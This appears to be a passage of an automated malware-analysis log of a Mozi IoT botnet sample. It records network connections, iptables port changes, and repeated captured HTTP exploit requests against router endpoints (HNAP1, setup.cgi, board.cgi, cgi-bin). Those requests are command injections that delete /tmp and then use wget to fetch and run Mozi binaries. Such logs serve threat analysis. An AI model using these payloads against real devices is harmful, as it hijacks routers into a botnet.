                Source: global trafficTCP traffic: 192.168.2.20:52472 -> 214.174.121.187:8080
                Source: global trafficTCP traffic: 192.168.2.20:36278 -> 108.225.201.127:81
                Source: global trafficTCP traffic: 192.168.2.20:53134 -> 175.19.214.30:49152
                Source: global trafficTCP traffic: 192.168.2.20:53630 -> 135.122.250.26:49152
                Source: global trafficTCP traffic: 192.168.2.20:41542 -> 85.46.127.177:8080
                Source: global trafficTCP traffic: 192.168.2.20:49464 -> 83.76.149.69:8080
                Source: global trafficTCP traffic: 192.168.2.20:50138 -> 133.60.187.33:5555
                Source: global trafficTCP traffic: 192.168.2.20:49468 -> 33.102.88.61:37215
                Source: global trafficTCP traffic: 192.168.2.20:52530 -> 206.35.150.107:8080
                Source: /bin/sh (PID: 4618)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 107.170.200.206:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 34.117.168.156:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.218.46.16:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
